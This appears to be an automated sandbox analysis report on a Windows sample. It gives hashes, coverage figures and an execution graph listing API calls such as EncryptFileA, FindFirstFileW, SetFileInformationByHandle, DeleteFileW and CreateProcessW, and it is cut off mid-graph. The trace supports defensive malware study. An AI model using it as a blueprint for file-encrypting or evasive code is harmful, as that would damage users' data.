                                                                                      • Opcode Fuzzy Hash: 0ba5735d690fff462cf55554bad8746523d3fceeb9882938484c6c1b25645b03
                                                                                      • Instruction Fuzzy Hash: E081AA74A00219DFDB08CF94C994BAEB7B1FF48314F148599E909AB351D734EA91CF91

                                                                                      Execution Graph

                                                                                      Execution Coverage:5.7%
                                                                                      Dynamic/Decrypted Code Coverage:96.3%
                                                                                      Signature Coverage:0.9%
                                                                                      Total number of Nodes:974
                                                                                      Total number of Limit Nodes:24
                                                                                      execution_graph 13052 21b8808 13057 21b8810 13052->13057 13053 21b88eb CreateFileW 13054 21b88b8 13053->13054 13053->13057 13055 21b40f0 GetPEB 13055->13057 13056 21b4190 GetPEB 13056->13057 13057->13053 13057->13054 13057->13055 13057->13056 12964 401600 LoadLibraryA GetProcAddress EncryptFileA 12965 401630 12964->12965 12966 40163f 22 API calls 12964->12966 12967 401878 VirtualAlloc 12966->12967 12968 40185e LdrAccessResource 12966->12968 12994 40100a 12967->12994 12968->12967 12970 4018b6 12997 401019 12970->12997 12972 4018c6 12973 4018e1 LoadIconA LoadCursorA GetStockObject RegisterClassA 12972->12973 12974 4019d3 CreateWindowExA ShowWindow UpdateWindow GetMessageA 12972->12974 12973->12974 12977 40195e 8 API calls 12973->12977 12975 401a3c 12974->12975 12976 401a6d ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N 12974->12976 12978 401a48 TranslateMessage DispatchMessageA GetMessageA 12975->12978 12979 401a96 12976->12979 12980 401a8b 12976->12980 12978->12976 12978->12978 12982 401acd ??3@YAXPAX 12979->12982 12985 401ac6 12979->12985 12980->12979 12981 401a9d ??3@YAXPAX 12980->12981 12981->12979 12982->12985 12983 401b26 12988 401b56 12983->12988 12989 401b5d ??3@YAXPAX 12983->12989 12984 401af6 12984->12983 12987 401b2d ??3@YAXPAX 12984->12987 12985->12984 12986 401afd ??3@YAXPAX 12985->12986 12986->12984 12987->12983 12990 401b86 12988->12990 12992 401b8d ??3@YAXPAX 12988->12992 12989->12988 12991 401bb9 12990->12991 12993 401bcd ??3@YAXPAX 12990->12993 12992->12990 12993->12991 12994->12970 12995 401210 malloc 12994->12995 12996 40122c 12995->12996 12996->12970 12997->12972 12999 4012e0 12997->12999 12998 4014d1 12998->12972 12999->12998 13000 40136e 22 API calls 12999->13000 13000->12999 13001 4014b8 13000->13001 13001->12972 13002 21b73c9 13005 21b73d0 13002->13005 13003 21b7555 13005->13003 13006 21b7320 GetPEB LoadLibraryW 13005->13006 13007 21b7479 LoadLibraryW 13005->13007 13008 21b4190 GetPEB 13005->13008 13009 21b40f0 GetPEB 13005->13009 13010 21b35f0 13005->13010 13006->13005 13007->13005 13008->13005 13009->13005 13011 21b3613 13010->13011 13012 21b3638 13011->13012 13020 21b4190 GetPEB 13011->13020 13016 21b4190 GetPEB 13012->13016 13019 21b3660 13012->13019 13017 21b3654 13016->13017 13018 21b40f0 GetPEB 13017->13018 13018->13019 13019->13005 13021 21b362c 13020->13021 13022 21b40f0 13021->13022 13023 21b414c 13022->13023 13025 21b412c 13022->13025 13023->13012 13024 21b4184 13024->13012 13025->13023 13025->13024 13026 21b4190 GetPEB 13025->13026 13029 21b4445 13025->13029 13027 21b4439 13026->13027 13028 21b40f0 GetPEB 13027->13028 13028->13029 13030 21b4190 GetPEB 13029->13030 13036 21b4476 13029->13036 13031 21b446a 13030->13031 13033 21b40f0 GetPEB 13031->13033 13032 21b40f0 GetPEB 13035 21b44a7 13032->13035 13033->13036 13034 21b4488 13034->13012 13035->13012 13036->13032 13036->13034 13037 21b8449 13051 21b8442 13037->13051 13038 21b86b6 13039 21b86da CloseHandle 13038->13039 13043 21b4190 GetPEB 13038->13043 13044 21b86dd 13039->13044 13040 21b35f0 GetPEB 13040->13051 13041 21b8532 SetFileInformationByHandle 13041->13051 13042 21b869f 13045 21b86c9 13043->13045 13047 21b40f0 GetPEB 13045->13047 13046 21b84aa CreateFileW 13046->13044 13046->13051 13048 21b86d5 13047->13048 13048->13039 13049 21b40f0 GetPEB 13049->13051 13050 21b4190 GetPEB 13050->13051 13051->13038 13051->13040 13051->13041 13051->13042 13051->13046 13051->13049 13051->13050 13058 21b4ec0 13059 21b4ed2 13058->13059 13063 21b4ee8 13058->13063 13060 21b4190 GetPEB 13059->13060 13061 21b4edc 13060->13061 13062 21b40f0 GetPEB 13061->13062 13062->13063 13064 21b4f27 CreateProcessW 13063->13064 13067 21b4190 GetPEB 13063->13067 13065 21b4fc3 13064->13065 13066 21b4f47 13064->13066 13068 21b4f4f 13066->13068 13071 21b4f83 13066->13071 13073 21b4190 GetPEB 13066->13073 13069 21b4f16 13067->13069 13070 21b40f0 GetPEB 13069->13070 13072 21b4f22 13070->13072 13076 21b4fad 13071->13076 13077 21b4190 GetPEB 13071->13077 13072->13064 13074 21b4f77 13073->13074 13075 21b40f0 GetPEB 13074->13075 13075->13071 13078 21b4fa1 13077->13078 13079 21b40f0 GetPEB 13078->13079 13079->13076 13903 21b31f0 13907 21b320a 13903->13907 13904 21b323d 13905 21b4190 GetPEB 13905->13907 13906 21b33e3 13906->13904 13909 21b4190 GetPEB 13906->13909 13907->13904 13907->13905 13907->13906 13908 21b33c9 RtlAllocateHeap 13907->13908 13911 21b40f0 GetPEB 13907->13911 13908->13904 13908->13907 13910 21b33f7 13909->13910 13912 21b40f0 GetPEB 13910->13912 13911->13907 13912->13904 13080 21b6060 13088 21b6860 13080->13088 13082 21b6065 13083 21b6089 ExitProcess 13082->13083 13084 21b4190 GetPEB 13082->13084 13085 21b6078 13084->13085 13086 21b40f0 GetPEB 13085->13086 13087 21b6084 13086->13087 13087->13083 13130 21b687d 13088->13130 13090 21b7312 13411 21bb6d0 13090->13411 13091 21b700a GetTickCount 13091->13130 13094 21b72fd 13094->13082 13097 21b4190 GetPEB 13097->13130 13101 21b72c5 13384 21b8a70 13101->13384 13102 21b4190 GetPEB 13113 21b6aee 13102->13113 13109 21b7305 13402 21b90b0 13109->13402 13112 21b4570 GetPEB 13112->13130 13113->13091 13113->13102 13118 21b40f0 GetPEB 13113->13118 13113->13130 13253 21b8330 13113->13253 13304 21b86f0 13113->13304 13317 21b73c0 13113->13317 13117 21b72ca 13117->13082 13118->13113 13124 21b730a 13124->13082 13129 21b40f0 GetPEB 13129->13130 13130->13090 13130->13091 13130->13094 13130->13097 13130->13101 13130->13109 13130->13112 13130->13113 13130->13129 13131 21b44b0 GetPEB 13130->13131 13132 21b8f20 13130->13132 13142 21b9b40 13130->13142 13154 21b8ca0 13130->13154 13165 21ba230 13130->13165 13174 21b6360 13130->13174 13189 21bb3d0 13130->13189 13194 21bb820 13130->13194 13201 21b93b0 13130->13201 13215 21b6490 13130->13215 13227 21b97d0 13130->13227 13234 21b4ac0 13130->13234 13244 21b91e0 13130->13244 13268 21b5720 13130->13268 13273 21b95d0 13130->13273 13284 21b12b0 13130->13284 13310 21b76b0 13130->13310 13325 21bb5c0 13130->13325 13330 21b7570 13130->13330 13340 21b3440 13130->13340 13350 21b18c0 13130->13350 13365 21b3590 13130->13365 13375 21b9910 13130->13375 13131->13130 13139 21b8f34 13132->13139 13133 21b9093 13442 21b37e0 13133->13442 13136 21b909c 13136->13130 13137 21b35f0 GetPEB 13137->13139 13138 21b9067 13138->13130 13139->13133 13139->13137 13139->13138 13140 21b40f0 GetPEB 13139->13140 13141 21b4190 GetPEB 13139->13141 13416 21b38b0 13139->13416 13140->13139 13141->13139 13153 21b9b60 13142->13153 13143 21b9e3b 13144 21b9e5a 13143->13144 13145 21b4190 GetPEB 13143->13145 13472 21b3190 13144->13472 13148 21b9e4e 13145->13148 13147 21b4190 GetPEB 13147->13153 13150 21b40f0 GetPEB 13148->13150 13149 21b40f0 GetPEB 13149->13153 13150->13144 13152 21b9c54 13152->13130 13153->13143 13153->13147 13153->13149 13153->13152 13462 21b7ee0 13153->13462 13164 21b8cbd 13154->13164 13155 21b8ee4 13157 21b4190 GetPEB 13155->13157 13158 21b8de5 13155->13158 13156 21b35f0 GetPEB 13156->13164 13159 21b8ef7 13157->13159 13158->13130 13161 21b40f0 GetPEB 13159->13161 13160 21b40f0 GetPEB 13160->13164 13161->13158 13163 21b4190 GetPEB 13163->13164 13164->13155 13164->13156 13164->13158 13164->13160 13164->13163 13494 21b5390 13164->13494 13167 21ba240 13165->13167 13166 21ba310 13168 21b4190 GetPEB 13166->13168 13172 21ba29e 13166->13172 13167->13166 13170 21b4190 GetPEB 13167->13170 13167->13172 13173 21b40f0 GetPEB 13167->13173 13169 21ba323 13168->13169 13171 21b40f0 GetPEB 13169->13171 13170->13167 13171->13172 13172->13130 13173->13167 13521 21b5850 13174->13521 13176 21b63a2 13176->13130 13177 21b642b 13531 21b36f0 13177->13531 13178 21b4190 GetPEB 13182 21b6374 13178->13182 13181 21b40f0 GetPEB 13181->13182 13182->13176 13182->13177 13182->13178 13182->13181 13183 21b6457 13187 21b3590 GetPEB 13183->13187 13184 21b4190 GetPEB 13185 21b644b 13184->13185 13186 21b40f0 GetPEB 13185->13186 13186->13183 13188 21b6479 13187->13188 13188->13130 13190 21bb4f1 13189->13190 13192 21bb3e8 13189->13192 13190->13130 13191 21b4190 GetPEB 13191->13192 13192->13190 13192->13191 13193 21b40f0 GetPEB 13192->13193 13193->13192 13196 21bb830 13194->13196 13195 21bb8aa 13195->13130 13196->13195 13541 21ba460 13196->13541 13561 21baf30 13196->13561 13577 21ba930 13196->13577 13591 21bab40 13196->13591 13212 21b93d0 13201->13212 13202 21b9539 13202->13130 13203 21b9583 13209 21b95ab 13203->13209 13211 21b4190 GetPEB 13203->13211 13204 21b9549 13204->13203 13205 21b4190 GetPEB 13204->13205 13207 21b9577 13205->13207 13206 21b40f0 GetPEB 13206->13212 13208 21b40f0 GetPEB 13207->13208 13208->13203 13209->13130 13210 21b4190 GetPEB 13210->13212 13213 21b959f 13211->13213 13212->13202 13212->13204 13212->13206 13212->13210 13214 21b40f0 GetPEB 13213->13214 13214->13209 13226 21b64b2 13215->13226 13216 21b6730 13216->13130 13217 21b665b 13217->13130 13219 21b4610 GetPEB 13219->13226 13221 21b40f0 GetPEB 13221->13226 13222 21b40f0 GetPEB 13225 21b66ca 13222->13225 13223 21b4190 GetPEB 13223->13226 13224 21b4190 GetPEB 13224->13225 13225->13216 13225->13222 13225->13224 13226->13217 13226->13219 13226->13221 13226->13223 13226->13225 13711 21b5900 13226->13711 13720 21b4fd0 13226->13720 13232 21b97f0 13227->13232 13228 21b4fd0 GetPEB 13228->13232 13229 21b98bc 13229->13130 13231 21b4190 GetPEB 13231->13232 13232->13228 13232->13229 13232->13231 13233 21b40f0 GetPEB 13232->13233 13729 21b4a10 13232->13729 13233->13232 13235 21b4ad5 13234->13235 13242 21b4aeb 13234->13242 13236 21b4190 GetPEB 13235->13236 13237 21b4adf 13236->13237 13240 21b40f0 GetPEB 13237->13240 13238 21b4190 GetPEB 13239 21b4b07 13238->13239 13241 21b40f0 GetPEB 13239->13241 13240->13242 13243 21b4b13 13241->13243 13242->13238 13242->13243 13243->13130 13252 21b9200 13244->13252 13245 21b9301 13245->13130 13246 21b9375 13246->13245 13247 21b4190 GetPEB 13246->13247 13248 21b9388 13247->13248 13249 21b40f0 GetPEB 13248->13249 13249->13245 13250 21b40f0 GetPEB 13250->13252 13251 21b4190 GetPEB 13251->13252 13252->13245 13252->13246 13252->13250 13252->13251 13267 21b8442 13253->13267 13254 21b86b6 13255 21b86da CloseHandle 13254->13255 13259 21b4190 GetPEB 13254->13259 13260 21b86dd 13255->13260 13256 21b35f0 GetPEB 13256->13267 13257 21b8532 SetFileInformationByHandle 13257->13267 13258 21b869f 13258->13113 13262 21b86c9 13259->13262 13260->13113 13261 21b4190 GetPEB 13261->13267 13264 21b40f0 GetPEB 13262->13264 13263 21b84aa CreateFileW 13263->13260 13263->13267 13266 21b86d5 13264->13266 13265 21b40f0 GetPEB 13265->13267 13266->13255 13267->13254 13267->13256 13267->13257 13267->13258 13267->13261 13267->13263 13267->13265 13272 21b5730 13268->13272 13269 21b57fa 13269->13130 13270 21b4190 GetPEB 13270->13272 13271 21b40f0 GetPEB 13271->13272 13272->13269 13272->13270 13272->13271 13276 21b95f0 13273->13276 13274 21b9628 13274->13130 13276->13274 13277 21b9799 13276->13277 13278 21b4570 GetPEB 13276->13278 13279 21b40f0 GetPEB 13276->13279 13280 21b4190 GetPEB 13276->13280 13744 21b1000 13276->13744 13277->13274 13281 21b4190 GetPEB 13277->13281 13278->13276 13279->13276 13280->13276 13282 21b97ac 13281->13282 13283 21b40f0 GetPEB 13282->13283 13283->13274 13301 21b12e1 13284->13301 13285 21b18a8 13286 21b4570 GetPEB 13285->13286 13288 21b1800 13286->13288 13288->13130 13290 21b4570 GetPEB 13290->13301 13291 21b4610 GetPEB 13291->13301 13294 21b35f0 GetPEB 13294->13301 13297 21b4190 GetPEB 13297->13301 13299 21b40f0 GetPEB 13299->13301 13301->13285 13301->13288 13301->13290 13301->13291 13301->13294 13301->13297 13301->13299 13303 21b3590 GetPEB 13301->13303 13753 21b22c0 13301->13753 13760 21b1cf0 13301->13760 13776 21b1ec0 13301->13776 13784 21b1ff0 13301->13784 13791 21b2ca0 13301->13791 13805 21b44b0 13301->13805 13811 21b1980 13301->13811 13833 21b51f0 13301->13833 13838 21b5f80 13301->13838 13303->13301 13308 21b8810 13304->13308 13305 21b88b8 13305->13113 13306 21b88eb CreateFileW 13306->13305 13306->13308 13307 21b4190 GetPEB 13307->13308 13308->13305 13308->13306 13308->13307 13309 21b40f0 GetPEB 13308->13309 13309->13308 13314 21b76c0 13310->13314 13311 21b785c 13311->13130 13312 21b4190 GetPEB 13312->13314 13313 21b5320 GetPEB 13313->13314 13314->13311 13314->13312 13314->13313 13315 21b40f0 GetPEB 13314->13315 13316 21b4610 GetPEB 13314->13316 13315->13314 13316->13314 13323 21b73d0 13317->13323 13318 21b7555 13318->13113 13319 21b35f0 GetPEB 13319->13323 13320 21b7320 GetPEB LoadLibraryW 13320->13323 13321 21b7479 LoadLibraryW 13321->13323 13322 21b4190 GetPEB 13322->13323 13323->13318 13323->13319 13323->13320 13323->13321 13323->13322 13324 21b40f0 GetPEB 13323->13324 13324->13323 13329 21bb5d0 13325->13329 13326 21bb69b 13326->13130 13327 21b4190 GetPEB 13327->13329 13328 21b40f0 GetPEB 13328->13329 13329->13326 13329->13327 13329->13328 13331 21b7579 13330->13331 13334 21b758f 13330->13334 13332 21b4190 GetPEB 13331->13332 13333 21b7583 13332->13333 13335 21b40f0 GetPEB 13333->13335 13336 21b4190 GetPEB 13334->13336 13338 21b75b8 13334->13338 13335->13334 13337 21b75ac 13336->13337 13339 21b40f0 GetPEB 13337->13339 13338->13130 13339->13338 13341 21b347a 13340->13341 13342 21b349f 13341->13342 13343 21b4190 GetPEB 13341->13343 13346 21b4190 GetPEB 13342->13346 13349 21b34c7 13342->13349 13344 21b3493 13343->13344 13345 21b40f0 GetPEB 13344->13345 13345->13342 13347 21b34bb 13346->13347 13348 21b40f0 GetPEB 13347->13348 13348->13349 13349->13130 13351 21b18cc 13350->13351 13352 21b18e2 13350->13352 13353 21b4190 GetPEB 13351->13353 13356 21b4190 GetPEB 13352->13356 13360 21b190b 13352->13360 13354 21b18d6 13353->13354 13355 21b40f0 GetPEB 13354->13355 13355->13352 13357 21b18ff 13356->13357 13358 21b40f0 GetPEB 13357->13358 13358->13360 13359 21b196e 13359->13130 13360->13359 13360->13360 13885 21b2680 13360->13885 13363 21b195c 13363->13130 13364 21b4570 GetPEB 13364->13359 13366 21b359d 13365->13366 13369 21b35b3 13365->13369 13367 21b4190 GetPEB 13366->13367 13368 21b35a7 13367->13368 13370 21b40f0 GetPEB 13368->13370 13371 21b4190 GetPEB 13369->13371 13373 21b35db 13369->13373 13370->13369 13372 21b35cf 13371->13372 13374 21b40f0 GetPEB 13372->13374 13373->13130 13374->13373 13376 21b9920 13375->13376 13377 21b9946 13376->13377 13378 21b9b11 13376->13378 13381 21b40f0 GetPEB 13376->13381 13382 21b35f0 GetPEB 13376->13382 13383 21b4190 GetPEB 13376->13383 13377->13130 13379 21b38b0 GetPEB 13378->13379 13380 21b9b21 13379->13380 13380->13130 13381->13376 13382->13376 13383->13376 13401 21b8a83 13384->13401 13385 21b8c30 13386 21b8c4f 13385->13386 13388 21b4190 GetPEB 13385->13388 13395 21b8c82 13386->13395 13396 21b4190 GetPEB 13386->13396 13387 21b35f0 GetPEB 13387->13401 13391 21b8c43 13388->13391 13389 21b8ba9 13389->13117 13390 21b4190 GetPEB 13390->13401 13393 21b40f0 GetPEB 13391->13393 13393->13386 13394 21b91e0 GetPEB 13394->13401 13395->13117 13397 21b8c76 13396->13397 13399 21b40f0 GetPEB 13397->13399 13398 21b40f0 GetPEB 13398->13401 13399->13395 13400 21b38b0 GetPEB 13400->13401 13401->13385 13401->13387 13401->13389 13401->13390 13401->13394 13401->13398 13401->13400 13892 21b7980 13401->13892 13409 21b90c0 13402->13409 13403 21b91a0 13405 21b4ec0 2 API calls 13403->13405 13404 21b35f0 GetPEB 13404->13409 13406 21b91b0 13405->13406 13406->13124 13407 21b90e7 13407->13124 13408 21b4190 GetPEB 13408->13409 13409->13403 13409->13404 13409->13407 13409->13408 13410 21b40f0 GetPEB 13409->13410 13410->13409 13414 21bb6dc 13411->13414 13412 21bb812 13412->13094 13413 21b4190 GetPEB 13413->13414 13414->13412 13414->13413 13415 21b40f0 GetPEB 13414->13415 13415->13414 13417 21b38c5 13416->13417 13421 21b38db 13416->13421 13418 21b4190 GetPEB 13417->13418 13419 21b38cf 13418->13419 13420 21b40f0 GetPEB 13419->13420 13420->13421 13422 21b4190 GetPEB 13421->13422 13423 21b390d 13421->13423 13424 21b3901 13422->13424 13425 21b3942 13423->13425 13427 21b4190 GetPEB 13423->13427 13426 21b40f0 GetPEB 13424->13426 13430 21b397a 13425->13430 13431 21b4190 GetPEB 13425->13431 13426->13423 13428 21b3936 13427->13428 13429 21b40f0 GetPEB 13428->13429 13429->13425 13433 21b39a6 13430->13433 13435 21b4190 GetPEB 13430->13435 13432 21b396e 13431->13432 13434 21b40f0 GetPEB 13432->13434 13438 21b39fc 13433->13438 13439 21b4190 GetPEB 13433->13439 13434->13430 13436 21b399a 13435->13436 13437 21b40f0 GetPEB 13436->13437 13437->13433 13438->13139 13440 21b39f0 13439->13440 13441 21b40f0 GetPEB 13440->13441 13441->13438 13443 21b35f0 GetPEB 13442->13443 13444 21b37f4 13443->13444 13445 21b3815 13444->13445 13446 21b4190 GetPEB 13444->13446 13448 21b384a 13445->13448 13450 21b4190 GetPEB 13445->13450 13447 21b3809 13446->13447 13449 21b40f0 GetPEB 13447->13449 13453 21b4190 GetPEB 13448->13453 13455 21b3872 13448->13455 13449->13445 13451 21b383e 13450->13451 13452 21b40f0 GetPEB 13451->13452 13452->13448 13454 21b3866 13453->13454 13457 21b40f0 GetPEB 13454->13457 13456 21b38a3 DeleteFileW 13455->13456 13458 21b4190 GetPEB 13455->13458 13456->13136 13457->13455 13459 21b3892 13458->13459 13460 21b40f0 GetPEB 13459->13460 13461 21b389e 13460->13461 13461->13456 13464 21b7f00 13462->13464 13463 21b8089 13466 21b4190 GetPEB 13463->13466 13471 21b80a9 13463->13471 13464->13463 13465 21b804c 13464->13465 13469 21b4190 GetPEB 13464->13469 13470 21b40f0 GetPEB 13464->13470 13465->13153 13467 21b809d 13466->13467 13468 21b40f0 GetPEB 13467->13468 13468->13471 13469->13464 13470->13464 13471->13153 13473 21b31a0 13472->13473 13474 21b31b5 13473->13474 13477 21b3a20 13473->13477 13474->13152 13476 21b31e0 13476->13152 13492 21b3a40 13477->13492 13478 21b3bb3 FindNextFileW 13478->13492 13479 21b3ca0 13481 21b3cc4 FindClose 13479->13481 13483 21b4190 GetPEB 13479->13483 13480 21b4190 GetPEB 13480->13492 13485 21b3cc7 13481->13485 13482 21b3bf1 13482->13476 13487 21b3cb3 13483->13487 13484 21b3b6b FindFirstFileW 13484->13485 13484->13492 13485->13476 13486 21b40f0 GetPEB 13486->13492 13488 21b40f0 GetPEB 13487->13488 13489 21b3cbf 13488->13489 13489->13481 13490 21b35f0 GetPEB 13490->13492 13491 21b3a20 GetPEB 13491->13492 13492->13478 13492->13479 13492->13480 13492->13482 13492->13484 13492->13486 13492->13490 13492->13491 13493 21b3590 GetPEB 13492->13493 13493->13492 13508 21b53ac 13494->13508 13495 21b570e 13495->13164 13496 21b56bc 13497 21b56db 13496->13497 13498 21b4190 GetPEB 13496->13498 13503 21b5708 RtlFreeHeap 13497->13503 13505 21b4190 GetPEB 13497->13505 13499 21b56cf 13498->13499 13502 21b40f0 GetPEB 13499->13502 13500 21b567a RtlAllocateHeap 13500->13495 13500->13508 13502->13497 13503->13495 13504 21b40f0 GetPEB 13504->13508 13507 21b56f7 13505->13507 13506 21b4190 GetPEB 13506->13508 13509 21b40f0 GetPEB 13507->13509 13508->13495 13508->13496 13508->13500 13508->13504 13508->13506 13511 21b4570 13508->13511 13510 21b5703 13509->13510 13510->13503 13512 21b457d 13511->13512 13517 21b4593 13511->13517 13513 21b4190 GetPEB 13512->13513 13514 21b4587 13513->13514 13515 21b40f0 GetPEB 13514->13515 13515->13517 13516 21b4190 GetPEB 13518 21b45af 13516->13518 13517->13516 13519 21b45bb 13517->13519 13520 21b40f0 GetPEB 13518->13520 13519->13508 13520->13519 13522 21b5866 13521->13522 13526 21b587c 13521->13526 13523 21b4190 GetPEB 13522->13523 13524 21b5870 13523->13524 13525 21b40f0 GetPEB 13524->13525 13525->13526 13527 21b4190 GetPEB 13526->13527 13530 21b58d6 13526->13530 13528 21b58ca 13527->13528 13529 21b40f0 GetPEB 13528->13529 13529->13530 13530->13182 13532 21b3714 13531->13532 13533 21b3739 13532->13533 13534 21b4190 GetPEB 13532->13534 13537 21b4190 GetPEB 13533->13537 13540 21b3761 13533->13540 13535 21b372d 13534->13535 13536 21b40f0 GetPEB 13535->13536 13536->13533 13538 21b3755 13537->13538 13539 21b40f0 GetPEB 13538->13539 13539->13540 13540->13183 13540->13184 13560 21ba477 13541->13560 13542 21ba8a9 13547 21ba8c8 13542->13547 13549 21b4190 GetPEB 13542->13549 13545 21ba872 13545->13196 13546 21b35f0 GetPEB 13546->13560 13554 21ba8f0 13547->13554 13555 21b4190 GetPEB 13547->13555 13548 21b4570 GetPEB 13548->13560 13551 21ba8bc 13549->13551 13553 21b40f0 GetPEB 13551->13553 13553->13547 13554->13196 13556 21ba8e4 13555->13556 13557 21b40f0 GetPEB 13556->13557 13557->13554 13558 21b40f0 GetPEB 13558->13560 13559 21b4190 GetPEB 13559->13560 13560->13542 13560->13545 13560->13546 13560->13548 13560->13558 13560->13559 13608 21b1140 13560->13608 13617 21bb0c0 13560->13617 13627 21b4ec0 13560->13627 13649 21bb910 13560->13649 13575 21baf50 13561->13575 13562 21bb048 13563 21bb067 13562->13563 13566 21b4190 GetPEB 13562->13566 13570 21bb08f 13563->13570 13571 21b4190 GetPEB 13563->13571 13564 21bb0c0 GetPEB 13564->13575 13565 21bb03e 13565->13196 13567 21bb05b 13566->13567 13569 21b40f0 GetPEB 13567->13569 13568 21b4ec0 2 API calls 13568->13575 13569->13563 13570->13196 13572 21bb083 13571->13572 13574 21b40f0 GetPEB 13572->13574 13573 21b4190 GetPEB 13573->13575 13574->13570 13575->13562 13575->13564 13575->13565 13575->13568 13575->13573 13576 21b40f0 GetPEB 13575->13576 13576->13575 13582 21ba93f 13577->13582 13578 21baae3 13579 21bab02 13578->13579 13581 21b4190 GetPEB 13578->13581 13585 21ba981 13579->13585 13588 21b4190 GetPEB 13579->13588 13583 21baaf6 13581->13583 13582->13578 13584 21b4190 GetPEB 13582->13584 13582->13585 13587 21b40f0 GetPEB 13582->13587 13667 21b46c0 13582->13667 13586 21b40f0 GetPEB 13583->13586 13584->13582 13585->13196 13586->13579 13587->13582 13589 21bab1e 13588->13589 13590 21b40f0 GetPEB 13589->13590 13590->13585 13607 21bab65 13591->13607 13592 21baecb 13593 21b4190 GetPEB 13592->13593 13596 21baeea 13592->13596 13594 21baede 13593->13594 13600 21b40f0 GetPEB 13594->13600 13595 21b4ec0 2 API calls 13595->13607 13597 21bae3d 13596->13597 13602 21b4190 GetPEB 13596->13602 13597->13196 13598 21b4190 GetPEB 13598->13607 13600->13596 13601 21bb0c0 GetPEB 13601->13607 13603 21baf06 13602->13603 13605 21b40f0 GetPEB 13603->13605 13605->13597 13606 21b40f0 GetPEB 13606->13607 13607->13592 13607->13595 13607->13597 13607->13598 13607->13601 13607->13606 13692 21b4ba0 13607->13692 13701 21b4cf0 13607->13701 13616 21b1150 13608->13616 13609 21b124a 13610 21b1242 13609->13610 13611 21b4190 GetPEB 13609->13611 13610->13560 13613 21b125d 13611->13613 13612 21b4190 GetPEB 13612->13616 13615 21b40f0 GetPEB 13613->13615 13614 21b40f0 GetPEB 13614->13616 13615->13610 13616->13609 13616->13610 13616->13612 13616->13614 13625 21bb0dd 13617->13625 13618 21b35f0 GetPEB 13618->13625 13619 21b4190 GetPEB 13619->13625 13620 21bb392 13621 21bb125 13620->13621 13622 21b4190 GetPEB 13620->13622 13621->13560 13623 21bb3a5 13622->13623 13624 21b40f0 GetPEB 13623->13624 13624->13621 13625->13618 13625->13619 13625->13620 13625->13621 13626 21b40f0 GetPEB 13625->13626 13626->13625 13628 21b4ed2 13627->13628 13632 21b4ee8 13627->13632 13629 21b4190 GetPEB 13628->13629 13630 21b4edc 13629->13630 13631 21b40f0 GetPEB 13630->13631 13631->13632 13633 21b4f27 CreateProcessW 13632->13633 13636 21b4190 GetPEB 13632->13636 13634 21b4fc3 13633->13634 13635 21b4f47 13633->13635 13634->13560 13637 21b4f4f 13635->13637 13640 21b4f83 13635->13640 13642 21b4190 GetPEB 13635->13642 13638 21b4f16 13636->13638 13637->13560 13639 21b40f0 GetPEB 13638->13639 13641 21b4f22 13639->13641 13645 21b4fad 13640->13645 13646 21b4190 GetPEB 13640->13646 13641->13633 13643 21b4f77 13642->13643 13644 21b40f0 GetPEB 13643->13644 13644->13640 13645->13560 13647 21b4fa1 13646->13647 13648 21b40f0 GetPEB 13647->13648 13648->13645 13651 21bb923 13649->13651 13650 21bb9c0 13652 21b4190 GetPEB 13650->13652 13653 21bb9b2 13650->13653 13651->13650 13651->13653 13657 21b4610 13651->13657 13654 21bb9e2 13652->13654 13653->13560 13656 21b40f0 GetPEB 13654->13656 13656->13653 13658 21b4633 13657->13658 13659 21b461d 13657->13659 13663 21b4190 GetPEB 13658->13663 13665 21b465b 13658->13665 13660 21b4190 GetPEB 13659->13660 13661 21b4627 13660->13661 13662 21b40f0 GetPEB 13661->13662 13662->13658 13664 21b464f 13663->13664 13666 21b40f0 GetPEB 13664->13666 13665->13651 13666->13665 13668 21b485e 13667->13668 13669 21b46d4 13667->13669 13668->13582 13669->13668 13670 21b4190 GetPEB 13669->13670 13673 21b4726 13669->13673 13671 21b471a 13670->13671 13672 21b40f0 GetPEB 13671->13672 13672->13673 13674 21b4190 GetPEB 13673->13674 13680 21b4786 13673->13680 13686 21b4844 13673->13686 13675 21b477a 13674->13675 13676 21b40f0 GetPEB 13675->13676 13676->13680 13677 21b480a 13687 21b48a0 13677->13687 13678 21b4190 GetPEB 13678->13680 13680->13677 13680->13678 13682 21b40f0 GetPEB 13680->13682 13682->13680 13683 21b4190 GetPEB 13684 21b4838 13683->13684 13685 21b40f0 GetPEB 13684->13685 13685->13686 13686->13582 13688 21b4820 13687->13688 13690 21b48bb 13687->13690 13688->13683 13688->13686 13689 21b4190 GetPEB 13689->13690 13690->13688 13690->13689 13691 21b40f0 GetPEB 13690->13691 13691->13690 13699 21b4bc0 13692->13699 13693 21b4cbe 13694 21b4190 GetPEB 13693->13694 13695 21b4cb6 13693->13695 13696 21b4cd1 13694->13696 13695->13607 13698 21b40f0 GetPEB 13696->13698 13697 21b4190 GetPEB 13697->13699 13698->13695 13699->13693 13699->13695 13699->13697 13700 21b40f0 GetPEB 13699->13700 13700->13699 13706 21b4d10 13701->13706 13702 21b4e8b 13703 21b4e81 13702->13703 13704 21b4190 GetPEB 13702->13704 13703->13607 13705 21b4e9e 13704->13705 13707 21b40f0 GetPEB 13705->13707 13706->13702 13706->13703 13708 21b35f0 GetPEB 13706->13708 13709 21b4190 GetPEB 13706->13709 13710 21b40f0 GetPEB 13706->13710 13707->13703 13708->13706 13709->13706 13710->13706 13714 21b5920 13711->13714 13712 21b5a14 13713 21b4190 GetPEB 13712->13713 13717 21b5a0c 13712->13717 13715 21b5a27 13713->13715 13714->13712 13714->13717 13718 21b4190 GetPEB 13714->13718 13719 21b40f0 GetPEB 13714->13719 13716 21b40f0 GetPEB 13715->13716 13716->13717 13717->13226 13718->13714 13719->13714 13728 21b4ff0 13720->13728 13721 21b5107 13722 21b50c2 13721->13722 13723 21b4190 GetPEB 13721->13723 13722->13226 13724 21b511a 13723->13724 13727 21b40f0 GetPEB 13724->13727 13725 21b4190 GetPEB 13725->13728 13726 21b40f0 GetPEB 13726->13728 13727->13722 13728->13721 13728->13722 13728->13725 13728->13726 13730 21b4a27 13729->13730 13733 21b4a3d 13729->13733 13731 21b4190 GetPEB 13730->13731 13732 21b4a31 13731->13732 13734 21b40f0 GetPEB 13732->13734 13735 21b4ab0 13733->13735 13736 21b4a71 13733->13736 13737 21b4190 GetPEB 13733->13737 13734->13733 13735->13232 13739 21b4aa2 13736->13739 13741 21b4190 GetPEB 13736->13741 13738 21b4a65 13737->13738 13740 21b40f0 GetPEB 13738->13740 13739->13232 13740->13736 13742 21b4a96 13741->13742 13743 21b40f0 GetPEB 13742->13743 13743->13739 13751 21b1010 13744->13751 13745 21b10fb 13746 21b10f3 13745->13746 13747 21b4190 